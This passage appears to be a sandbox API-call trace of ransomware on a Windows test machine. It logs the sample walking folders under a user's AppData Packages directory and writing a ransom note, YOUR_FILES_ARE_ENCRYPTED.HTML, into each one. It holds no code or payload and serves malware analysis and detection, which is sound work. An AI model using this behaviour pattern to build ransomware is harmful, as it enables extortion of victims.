lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.214] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache") returned 98 [0121.214] GetProcessHeap () returned 0x600000 [0121.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.215] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache" [0121.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\*" [0121.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.215] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 1 [0121.215] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 0 [0121.215] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.216] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0121.216] GetProcessHeap () returned 0x600000 [0121.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.217] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.218] CloseHandle (hObject=0x31c) returned 1 [0121.218] GetProcessHeap () returned 0x600000 [0121.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.218] GetProcessHeap () returned 0x600000 [0121.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.218] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0121.218] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.219] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies") returned 100 [0121.219] GetProcessHeap () returned 0x600000 [0121.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.219] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies" [0121.219] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\*" [0121.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.219] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 1 [0121.219] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 0 [0121.219] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.219] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0121.219] GetProcessHeap () returned 0x600000 [0121.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.220] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.221] CloseHandle (hObject=0x31c) returned 1 [0121.221] GetProcessHeap () returned 0x600000 [0121.221] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.221] GetProcessHeap () returned 0x600000 [0121.221] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.221] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0121.221] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.221] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory") returned 100 [0121.221] GetProcessHeap () returned 0x600000 [0121.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.221] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory" [0121.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\*" [0121.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.222] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 1 [0121.222] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 0 [0121.222] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.222] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0121.222] GetProcessHeap () returned 0x600000 [0121.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.223] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.224] CloseHandle (hObject=0x31c) returned 1 [0121.224] GetProcessHeap () returned 0x600000 [0121.224] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.224] GetProcessHeap () returned 0x600000 [0121.224] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.224] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.224] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.224] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp") returned 93 [0121.224] GetProcessHeap () returned 0x600000 [0121.224] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.224] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp" [0121.224] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\*" [0121.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 1 [0121.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da798, dwReserved1=0x62f060, cFileName="..", cAlternateFileName="")) returned 0 [0121.225] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.225] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.225] GetProcessHeap () returned 0x600000 [0121.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.225] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.226] CloseHandle (hObject=0x31c) returned 1 [0121.226] GetProcessHeap () returned 0x600000 [0121.226] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.226] GetProcessHeap () returned 0x600000 [0121.226] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.227] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e55b288, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e55b288, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e55b288, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="Temp", cAlternateFileName="")) returned 0 [0121.227] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.227] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0121.227] GetProcessHeap () returned 0x600000 [0121.227] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.228] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.229] CloseHandle (hObject=0x320) returned 1 [0121.229] GetProcessHeap () returned 0x600000 [0121.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.229] GetProcessHeap () returned 0x600000 [0121.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.230] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.230] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.230] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData") returned 93 [0121.230] GetProcessHeap () returned 0x600000 [0121.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.230] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData" [0121.230] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\*" [0121.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e49c81d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName=".", cAlternateFileName="")) returned 0x626778 [0121.231] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e49c81d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e49c81d, 